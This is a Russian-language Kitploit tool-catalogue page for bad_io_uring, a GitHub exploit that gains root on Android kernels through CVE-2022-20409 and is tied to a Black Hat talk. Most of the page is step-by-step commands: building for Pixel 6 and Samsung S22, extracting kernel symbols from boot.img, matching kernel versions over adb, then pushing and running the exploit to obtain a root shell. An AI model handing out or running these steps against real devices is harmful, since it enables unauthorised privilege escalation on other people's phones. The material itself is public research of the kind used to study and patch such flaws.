Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
bad_io_uring — Эксплуатация ядра Android для CVE-2022-20409 | Kitploit
Инструменты/GitHubGitHub/markakd/bad_io_uring
Безопасность AndroidПовышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеМобильная безопасностьЭксплуатация Бинарных Файлов
GitHubmarkakd/bad_io_uring

bad_io_uring

Эксплуатация ядра Android для CVE-2022-20409

Репозиторий
213301 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Bad IO_uring

https://www.blackhat.com/us-23/briefings/schedule/index.html#bad-io_uring-a-new-era-of-rooting-for-android-32243

Сборка эксплойта

Убедитесь, что установлен Android NDK. Для Pixel 6,

root@kitploit:~
make pixel

Для Samsung S22,

root@kitploit:~
make s22

Как использовать эксплойт

Эксплойт написан для поддержки различных версий ядер. Для переноса эксплойта на другое ядро необходимо извлечь файл символов целевого ядра.

Ядро можно извлечь из заводского образа телефона. Для Pixel загрузите заводской образ здесь.

После загрузки образа извлеките его, чтобы получить файл boot.img. boot.img можно извлечь с помощью tools/unpack_bootimg.py.

root@kitploit:~
python3 tools/unpack_bootimg.py --boot_img boot.img --out out

Вы увидите ядро в out/kernel

Теперь, имея образ ядра, мы можем использовать vmlinux-to-elf для извлечения символов ядра из него.

root@kitploit:~
./tools/vmlinux-to-elf/kallsyms-finder out/kernel > pixel.kallsyms

Вы должны убедиться, что Version string, извлечённая в символах, соответствует версии ядра вашего телефона. Версию ядра телефона можно узнать через adb. Например,

root@kitploit:~
sh-3.2$ adb shell
oriole:/ $ uname -a
Linux localhost 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022 aarch64

соответствует

root@kitploit:~
[+] Version string: Linux version 5.10.66-android12-9-00007-g66c74c58ab38-ab8262750 (build-user@build-host) (Android (7284624, based on r416183b) clang version 12.0.5 (https://android.googlesource.com/toolchain/llvm-project c935d99d7cf2016289302412d708641d52d2f7ee), LLD 12.0.5 (/buildbot/src/android/llvm-toolchain/out/llvm-project/lld c935d99d7cf2016289302412d708641d52d2f7ee)) #1 SMP PREEMPT Mon Mar 7 01:27:36 UTC 2022

Теперь вы можете отправить эксплойт и файл символов на телефон и получить root-доступ с помощью следующих команд.

root@kitploit:~
make
adb push exp pixel.kallsyms /data/local/tmp
adb shell
cd /data/local/tmp
./exp pixel.kallsyms

Наслаждайтесь root-оболочкой :)

Скачать инструмент